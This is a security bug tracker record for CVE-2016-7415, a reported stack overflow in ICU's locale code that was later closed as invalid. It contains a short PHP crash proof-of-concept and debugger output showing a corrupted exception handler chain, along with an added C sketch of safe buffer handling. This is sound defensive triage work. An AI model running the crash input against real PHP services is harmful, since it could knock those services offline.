Bug 999822 (CVE-2016-7415) - VUL-0: CVE-2016-7415: icu: Stack based buffer overflow in locid.cpp
Summary: VUL-0: CVE-2016-7415: icu: Stack based buffer overflow in locid.cpp
Status: RESOLVED INVALID
Alias: CVE-2016-7415
Product: SUSE Security Incidents
Classification: Novell Products
Component: Incidents
Version: unspecified
Hardware: Other Other
Priority: P3 - Medium    Severity: Normal
Target Milestone: ---
Assignee: Cliff Zhao
QA Contact: Security Team bot
URL: https://smash.suse.de/issue/172665/
Whiteboard: CVSSv2:SUSE:CVE-2016-7415:6.8:(AV:N/A...
Keywords:
Depends on:
Blocks:
 
Reported: 2016-09-20 06:51 UTC by Victor Pereira
Modified: 2017-10-19 15:10 UTC
CC: 3 users

See Also:
Found By: Security Response Team
Services Priority:
Business Priority:
Blocker: ---
Marketing QA Status: ---
IT Deployment: ---


Attachments
CVE-2016-7415.c (303 bytes, text/plain)
2016-12-20 17:21 UTC, Marcus Meissner
Comment 1 Victor Pereira 2016-09-20 14:46:34 UTC
Test script:
---------------
<?php

ini_set('memory_limit', -1);

$v1 = str_repeat("ABCE", 503566756/3);
$v2 = "test";
$v3 = [];

MessageFormatter::formatMessage($v1, $v2, $v3);
// msgfmt_format_message($v1, $v2, $v3);

Expected result:
----------------
no crash

Actual result:
--------------
Microsoft (R) Windows Debugger Version 6.11.0001.404 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.

CommandLine: C:\tools\php7010\php.exe -n -dextension=ext\php_bz2.dll  -dextension=ext\php_com_dotnet.dll  -dextension=ext\php_curl.dll  -dextension=ext\php_enchant.dll  -dextension=ext\php_exif.dll  -dextension=ext\php_fileinfo.dll  -dextension=ext\php_ftp.dll  -dextension=ext\php_gd2.dll  -dextension=ext\php_gettext.dll  -dextension=ext\php_gmp.dll  -dextension=ext\php_imap.dll  -dextension=ext\php_intl.dll  -dextension=ext\php_ldap.dll  -dextension=ext\php_mbstring.dll  -dextension=ext\php_mysqli.dll   -dextension=ext\php_odbc.dll  -dextension=ext\php_openssl.dll   -dextension=ext\php_pdo_mysql.dll   -dextension=ext\php_pdo_odbc.dll  -dextension=ext\php_pdo_pgsql.dll  -dextension=ext\php_pdo_sqlite.dll  -dextension=ext\php_pgsql.dll  -dextension=ext\php_phpdbg_webhelper.dll  -dextension=ext\php_shmop.dll  -dextension=ext\php_soap.dll  -dextension=ext\php_sockets.dll  -dextension=ext\php_sqlite3.dll  -dextension=ext\php_sysvshm.dll  -dextension=ext\php_tidy.dll  -dextension=ext\php_xmlrpc.dll  -dextension=ext\php_xsl.dll  -dextension=ext\php_yaml.dll poc.php

...

(e5c.d80): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
*** WARNING: Unable to verify checksum for C:\tools\php7010\icuuc57.dll
*** ERROR: Symbol file could not be found.  Defaulted to export symbols for C:\tools\php7010\icuuc57.dll - 
Processing initial command 'r;!exploitable -v'
icuuc57!icu_57::Locale::Locale+0x27c:
4a85613c 8801            mov     byte ptr [ecx],al          ds:002b:05360000=00
0:000:x86> r;!exploitable -v
eax=0535e545 ebx=00000000 ecx=05360000 edx=10201a74 esi=0535e59d edi=00000000
eip=4a85613c esp=0535e55c ebp=0535e64c iopl=0         nv up ei pl nz na po nc
cs=0023  ss=002b  ds=002b  es=002b  fs=0053  gs=002b             efl=00010202
icuuc57!icu_57::Locale::Locale+0x27c:
4a85613c 8801            mov     byte ptr [ecx],al          ds:002b:05360000=00

!exploitable 1.6.0.0
HostMachine\HostUser
Executing Processor Architecture is x86
Debuggee is in User Mode
Debuggee is a live user mode debugging session on the local machine
Event Type: Exception
Exception Faulting Address: 0x5360000
First Chance Exception Type: STATUS_ACCESS_VIOLATION (0xC0000005)
Exception Sub-Type: Write Access Violation

Exception Hash (Major/Minor): 0xbf0ac847.0x9fec2922

 Hash Usage : Stack Trace:
Major+Minor : icuuc57!icu_57::Locale::Locale+0x27c
Major+Minor : Unknown
Major+Minor : Unknown
Major+Minor : Unknown
Major+Minor : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
...
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Minor       : Unknown
Instruction Address: 0x000000004a85613c

Description: Exception Handler Chain Corrupted
Short Description: ExceptionHandlerCorrupted
Exploitability Classification: EXPLOITABLE
Recommended Bug Title: Exploitable - Exception Handler Chain Corrupted starting at icuuc57!icu_57::Locale::Locale+0x000000000000027c (Hash=0xbf0ac847.0x9fec2922)

Corruption of the exception handler chain is considered exploitable
0:000:x86> !exchain
000000000535e640: 0000000043424145
Invalid exception stack at 0000000043424145     // Exception handler overwritten with 'ABCE'
0:000:x86> k
ChildEBP RetAddr  
WARNING: Stack unwind information not available. Following frames may be wrong.
0535e64c 43424145 icuuc57!icu_57::Locale::Locale+0x27c
0535e650 43424145 0x43424145
0535e654 43424145 0x43424145
0535e658 43424145 0x43424145
0535e65c 43424145 0x43424145
0535e660 43424145 0x43424145
0535e664 43424145 0x43424145
0535e668 43424145 0x43424145
0535e66c 43424145 0x43424145
0535e670 43424145 0x43424145
0535e674 43424145 0x43424145
0535e678 43424145 0x43424145
0535e67c 43424145 0x43424145
0535e680 43424145 0x43424145
0535e684 43424145 0x43424145
0535e688 43424145 0x43424145
0535e68c 43424145 0x43424145
0535e690 43424145 0x43424145
0535e694 43424145 0x43424145
0535e698 43424145 0x43424145
Comment 3 Swamp Workflow Management 2016-09-20 22:00:50 UTC
bugbot adjusting priority
Comment 4 Victor Pereira 2016-10-06 13:16:50 UTC
The code is there, however in some code streams we have the -fstack-protector compiler flag enabled, which works as a workaround. Please submit to all codestreams.
Comment 7 Victor Pereira 2016-12-16 08:44:59 UTC
The upstream bug: http://bugs.icu-project.org/trac/ticket/12745
Comment 8 Marcus Meissner 2016-12-20 17:07:27 UTC
If this is in Locale::Locale of icu, and tries to overflow the fullname buffer...

even sles10 sp3 seems to have buffer management to avoid overflowing that.
Comment 9 Marcus Meissner 2016-12-20 17:21:03 UTC
Created attachment 707308 [details]
CVE-2016-7415.c

QA REPRODUCER:

gcc -O2 -Wall -g CVE-2016-7415.c -o CVE-2016-7415 -licui18n
./CVE-2016-7415

should not crash
Comment 10 Marcus Meissner 2016-12-20 17:22:13 UTC
I think the reproducer captures the essence of the problem.

But it does not crash for me.
Comment 11 Marcus Meissner 2016-12-21 10:17:01 UTC
The only reason this could crash is if the size calculation in Locale::Locale in icu/source/common/locid.cpp does not match the strings copied later on.

I looked over the code and it all looks okish to me.

Unless we have a working reproducer on Linux I would consider this not an issue.
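As an added example, not the attachment and not ICU's code: a standalone C sketch of the preflight-then-heap buffer management that comment 8 credits ICU with, and of the size check comment 11 names as the only way this could fail. canonicalize_id is a local stand-in for a uloc_canonicalize-style call (an assumption, with simplified normalization), and the buffer size is only chosen to match ICU's ULOC_FULLNAME_CAPACITY.

```c
#include <stdlib.h>
#include <string.h>

#define FULLNAME_CAPACITY 157  /* same value ICU uses for ULOC_FULLNAME_CAPACITY */

/* Stand-in for a uloc_canonicalize-style preflighting call (not ICU's code):
 * lowercases, turns '-' into '_', writes at most cap bytes including the NUL,
 * and always returns the length the full canonical form needs. */
static int canonicalize_id(const char *id, char *out, int cap) {
    int need = (int)strlen(id);
    for (int i = 0; i < need; i++) {
        char c = id[i];
        if (c == '-') c = '_';
        else if (c >= 'A' && c <= 'Z') c = (char)(c + ('a' - 'A'));
        if (i < cap - 1) out[i] = c;            /* never write past the buffer */
    }
    if (cap > 0) out[need < cap ? need : cap - 1] = '\0';
    return need;
}

/* The safe pattern: preflight into a fixed-size stack buffer, fall back to the
 * heap when the reported length does not fit, re-run with the exact size, and
 * refuse to continue if the second length disagrees with the first (the size
 * mismatch comment 11 describes). Returns a malloc'd string or NULL. */
char *locale_fullname(const char *id) {
    char stackbuf[FULLNAME_CAPACITY];
    int len = canonicalize_id(id, stackbuf, (int)sizeof stackbuf);
    if (len < (int)sizeof stackbuf) {           /* fits: stack copy is complete */
        char *copy = malloc((size_t)len + 1);
        if (copy) memcpy(copy, stackbuf, (size_t)len + 1);
        return copy;
    }
    char *heap = malloc((size_t)len + 1);
    if (!heap) return NULL;
    if (canonicalize_id(id, heap, len + 1) != len) { free(heap); return NULL; }
    return heap;
}

/* Feeds an n-byte "ABCEABCE..." locale ID (constructed like the PHP PoC input)
 * through locale_fullname; returns the resulting length, or -1 on failure. */
int check_large_input(size_t n) {
    char *big = malloc(n + 1);
    if (!big) return -1;
    for (size_t i = 0; i < n; i++) big[i] = "ABCE"[i % 4];
    big[n] = '\0';
    char *name = locale_fullname(big);
    int len = name ? (int)strlen(name) : -1;
    free(name); free(big);
    return len;
}
```

With the stack buffer holding 157 bytes, inputs of 156 bytes take the stack path and anything from 157 bytes upward takes the heap path; both return the full canonical name rather than writing past the buffer.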
Comment 12 Felix Zhang 2017-03-01 16:17:58 UTC
Reassign to our current icu maintainer.
Comment 13 Cliff Zhao 2017-10-13 12:38:55 UTC
(In reply to Marcus Meissner from comment #11)
> The only reason this could crash is if the size calculation in Locale::Locale
> in 
> icu/source/common/locid.cpp 
> does not match the strings copied later on.
> 
> I looked over the code and it all looks okish to me.
> 
> Unless we have a working reproducer on Linux I would consider this not an
> issue.

If so, can we close this as not a bug?
Comment 14 Marcus Meissner 2017-10-19 15:10:32 UTC
yes